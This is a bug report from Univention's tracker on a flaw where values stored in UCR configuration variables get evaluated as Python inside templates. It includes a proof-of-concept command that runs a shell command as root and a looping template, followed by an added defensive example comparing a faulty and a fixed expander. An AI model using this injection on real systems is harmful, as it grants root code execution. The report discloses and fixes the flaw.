Univention Bugzilla – Bug 49853
UCR variables printed via @%@ execute python code
Last modified: 2019-07-16 11:44:34 CEST
If a UCR template contains @%@foo@%@ the UCR variable "foo" might contain @!@...@!@ which would then be evaluated as Python code.

Example:

  # ucr set ldap/debug/level='@!@import os; os.system("id >> /tmp/executed");@!@'
  Setting ldap/debug/level
  Multifile: /etc/ldap/slapd.conf
  # cat /tmp/executed
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)
  uid=0(root) gid=0(root) Gruppen=0(root)

The same applies for code inside of @!@ which prints @!@-code. Here is code which causes an endless loop:

  # echo '@!@print(open('foo.tpl').read())@!@' > foo.tpl
  # ucr filter < foo.tpl
  … runs forever …

I think this is
1. bad and unexpected behavior
2. a potential security risk as ucr_filter() is e.g. used elsewhere, too (e.g. in the appcenter without UCR variables)
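The root cause described in this report is an ordering problem: substituted text (variable values, or the output of a code block) is scanned again for @!@/@%@ markers, so data is promoted to code. The following is an added illustration, not UCR's own ucr_filter() implementation (which is not shown on this page): a toy template expander in two variants. expand_two_pass() models the variable-first ordering the report describes, and expand_single_pass() is the hardened form that tokenizes the original template exactly once and appends values and code output as inert text. The exec namespace names "variables" and "template_source", and the sample variable values, are constructed for this example and are not UCR's real API.

```python
import contextlib
import io
import re

# Marker syntax from the bug report: @!@ ... @!@ wraps Python code whose stdout
# is inserted into the output, @%@name@%@ is replaced by the value of the UCR
# variable "name". One regex with two alternatives lets us tokenize in a
# single left-to-right scan.
TOKEN_RE = re.compile(r"@!@(?P<code>.*?)@!@|@%@(?P<var>[^@\s]+)@%@", re.DOTALL)


def _namespace(template, variables):
    # Assumed exec namespace for this example; UCR's real names differ.
    return {"variables": dict(variables), "template_source": template}


def run_code_block(code, namespace):
    """Execute one @!@...@!@ block and return what it printed to stdout."""
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        exec(code, namespace)
    return buf.getvalue()


def expand_two_pass(template, variables):
    """Faulty ordering (models the bug): substitute variables first, then scan
    the *combined* text for code blocks. A value such as '@!@...@!@' is
    therefore executed although it is data, not template."""
    def sub_var(m):
        if m.group("var") is not None:
            return variables.get(m.group("var"), "")
        return m.group(0)                       # leave code blocks for pass 2

    with_values = TOKEN_RE.sub(sub_var, template)

    def sub_code(m):
        if m.group("code") is not None:
            return run_code_block(m.group("code"), _namespace(template, variables))
        return m.group(0)

    return TOKEN_RE.sub(sub_code, with_values)  # rescans substituted values


def expand_single_pass(template, variables):
    """Hardened form: tokenize the original template once. Variable values and
    code output are appended verbatim and never rescanned, so neither '@!@' in
    a value nor code that prints its own source gets evaluated again."""
    out = []
    pos = 0
    for m in TOKEN_RE.finditer(template):
        out.append(template[pos:m.start()])      # literal template text
        if m.group("code") is not None:
            out.append(run_code_block(m.group("code"), _namespace(template, variables)))
        else:
            out.append(variables.get(m.group("var"), ""))  # inert text
        pos = m.end()
    out.append(template[pos:])
    return "".join(out)


# Constructed sample data: a harmless value that merely looks like a code block.
VARIABLES = {
    "ldap/debug/level": "0",
    "hostname": "@!@print('evaluated')@!@",
}
TEMPLATE = "level=@%@ldap/debug/level@%@ host=@%@hostname@%@"
# Models the self-printing template from the report without touching the
# filesystem: the block prints its own template source.
SELF_PRINTING = "@!@print(template_source, end='')@!@"


if __name__ == "__main__":
    print(repr(expand_two_pass(TEMPLATE, VARIABLES)))     # value got executed
    print(repr(expand_single_pass(TEMPLATE, VARIABLES)))  # value stays literal
    print(repr(expand_single_pass(SELF_PRINTING, VARIABLES)))  # terminates
```

The two functions are a convenient regression check for the two symptoms in the report: with the single-pass expander a variable value containing markers comes out literally, and a block that prints its own source yields that source once and stops, because nothing that was produced during expansion is ever fed back into the tokenizer.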